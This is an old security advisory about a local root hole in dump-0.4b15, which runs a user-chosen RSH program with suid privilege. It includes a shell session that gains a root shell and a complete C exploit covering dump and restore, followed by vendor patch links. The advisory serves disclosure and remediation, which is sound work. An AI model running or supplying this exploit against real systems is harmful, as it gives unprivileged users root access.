COMMAND

    dump

SYSTEMS AFFECTED

    dump-0.4b15

PROBLEM

    Mat found following.  Linux dump command executes external program
    with suid priviledge.  Example:

        [mat@localhost mat]$ export TAPE=garbage:garbage
        [mat@localhost mat]$ export RSH=/home/mat/execute_this
        [mat@localhost mat]$ cat > /home/mat/execute_this
        #!/bin/sh
        cp /bin/sh /home/mat/sh
        chmod 4755 /home/mat/sh
        [mat@localhost mat]$ chmod 755 /home/mat/execute_this
        [mat@localhost mat]$ /sbin/dump -0 /
          DUMP: Connection to garbage established.
          DUMP: Date of this level 0 dump: Tue Oct 31 14:38:00 2000
          DUMP: Date of last level 0 dump: the epoch
          DUMP: Dumping /dev/hda2 (/) to garbage on host garbage
          DUMP: Label: none
        /dev/hda2: Permission denied while opening filesystem
         [mat@localhost mat]$ ls -la /home/mat/sh
         -rwsr-xr-x    1 root     tty        316848 Oct 31 14:38 /home/mat/sh
         [mat@localhost mat]$ /home/mat/sh
         bash# id
         uid=500(mat) gid=500(mat) euid=0(root) groups=500(mat)

    This is quick and dirty exploit:

    /*
    **
    **  dump-0.4b15x.c
    **
    **  dump-0.4b15 exploit:
    **  Redhat 6.2 dump command executes
    **  external program with suid priviledge.
    **
    **  affected:
    **     /sbin/dump
    **     /sbin/dump.static
    **     /sbin/restore
    **     /sbin/restore.static
    **
    **  Bug found by mat@hacksware.com
    **
    **  This example was coded by md0claes@mdstud.chalmers.se
    **  It was written for EDUCATIONAL PURPOSES ONLY.
    **
    **
    */


    #include <unistd.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <errno.h>
    #include <sys/types.h>
    #include <sys/stat.h>
    #include <fcntl.h>

    #define RUNME     "/tmp/runme"      /* tmp file */
    #define SUID_PATH "/tmp/superdude" /* the power of root */

    void usage(char *pname)
    {
     fprintf(stdout, "\nUsage: %s < d | s | r | p >\n\n", pname);
     fprintf(stdout,   "  d - exploit /sbin/dump\n");
     fprintf(stdout,   "  s - exploit /sbin/dump.static\n");
     fprintf(stdout,   "  r - exploit /sbin/restore\n");
     fprintf(stdout,   "  p - exploit /sbin/restore.static\n\n");
    }

    int main(int argc, char *argv[], char *envp[])
    {
     int fd;
     pid_t pid;
     char *bad_env[] = { "TAPE=garbage:garbage", "RSH="RUNME };
     char   runbuf[] = { "#!/bin/sh\n/bin/cp /bin/bash "
                        SUID_PATH "\nchmod 6755 " SUID_PATH };

     char *suid[] = { SUID_PATH, NULL };
     char   *av[] = { "/sbin/restore.static", "restore.static",
                      "-t", "/tmp/foo" };

     if (argc != 2) {
      usage(argv[0]);
      exit(1);
     }

     switch(tolower(argv[1][0])) {

      case 'd':
       av[0] = "/sbin/dump";
       av[1] = "dump";
       av[2] = "-0";
       av[3] = "/";
       break;

      case 's':
       av[0] = "/sbin/dump.static";
       av[1] = "dump.static";
       av[2] = "-0";
       av[3] = "/";
       break;

      case 'r':
       av[0] = "/sbin/restore";
       av[1] = "restore";
       break;

      case 'p':
       break;

      default:
       usage(argv[0]);
       exit(1);
     }

     if ((fd = open(RUNME,O_WRONLY|O_CREAT|O_TRUNC, 0755)) == -1) {
      perror("fopen");
      exit(1);
     }

     if (write(fd, runbuf, sizeof(runbuf)) == -1) {
      perror("write");
      exit(1);
     }
     close(fd);

     if ((pid = fork()) < 0) {
      perror("fork");
      exit(1);
     }

     else if (pid == 0) {
      if (execle(av[0], av[1], av[2], av[3], NULL, bad_env) < 0) {
       perror("execle");
       _exit(1);
      }
     }

     sleep(1);
     unlink(RUNME);
     fprintf(stdout, "\nExploited %s \n", av[0]);
     fprintf(stdout, "Running " SUID_PATH "\n");
     execve(SUID_PATH, suid, envp);

     exit(0);
    }

SOLUTION

    This is the location for the latest version

        ftp://ftp.sourceforge.net/pub/sourceforge/dump/

    dump is no longer suid root.

    For RedHat:

        ftp://updates.redhat.com/5.2/alpha/dump-0.4b19-5.5x.alpha.rpm
        ftp://updates.redhat.com/5.2/alpha/dump-static-0.4b19-5.5x.alpha.rpm
        ftp://updates.redhat.com/5.2/alpha/rmt-0.4b19-5.5x.alpha.rpm
        ftp://updates.redhat.com/5.2/sparc/dump-0.4b19-5.5x.sparc.rpm
        ftp://updates.redhat.com/5.2/sparc/dump-static-0.4b19-5.5x.sparc.rpm
        ftp://updates.redhat.com/5.2/sparc/rmt-0.4b19-5.5x.sparc.rpm
        ftp://updates.redhat.com/5.2/i386/dump-0.4b19-5.5x.i386.rpm
        ftp://updates.redhat.com/5.2/i386/dump-static-0.4b19-5.5x.i386.rpm
        ftp://updates.redhat.com/5.2/i386/rmt-0.4b19-5.5x.i386.rpm
        ftp://updates.redhat.com/5.2/SRPMS/dump-0.4b19-5.5x.src.rpm
        ftp://updates.redhat.com/6.2/alpha/dump-0.4b19-5.6x.alpha.rpm
        ftp://updates.redhat.com/6.2/alpha/dump-static-0.4b19-5.6x.alpha.rpm
        ftp://updates.redhat.com/6.2/alpha/rmt-0.4b19-5.6x.alpha.rpm
        ftp://updates.redhat.com/6.2/sparc/dump-0.4b19-5.6x.sparc.rpm
        ftp://updates.redhat.com/6.2/sparc/dump-static-0.4b19-5.6x.sparc.rpm
        ftp://updates.redhat.com/6.2/sparc/rmt-0.4b19-5.6x.sparc.rpm
        ftp://updates.redhat.com/6.2/i386/dump-0.4b19-5.6x.i386.rpm
        ftp://updates.redhat.com/6.2/i386/dump-static-0.4b19-5.6x.i386.rpm
        ftp://updates.redhat.com/6.2/i386/rmt-0.4b19-5.6x.i386.rpm
        ftp://updates.redhat.com/6.2/SRPMS/dump-0.4b19-5.6x.src.rpm

    All released versions  of Trustix Secure  Linux contain a  version
    of dump that is known to  have a local root exploit.   People with
    untrusted local users should upgrade as soon as possible.  Get the
    packages at:

        ftp://ftp.trustix.com/pub/Trustix/updates/1.1/RPMS/
        http://www.trustix.net/download/Trustix/updates/1.1/RPMS/
             dump-0.4b19-2tr.i586.rpm
             rmt-0.4b19-2tr.i586.rpm

    Conectiva last mandatory update of the dump package brought it  up
    to version 0.4b18 and had the SUID bits disabled.  These  packages
    do not have the vulnerability discussed above.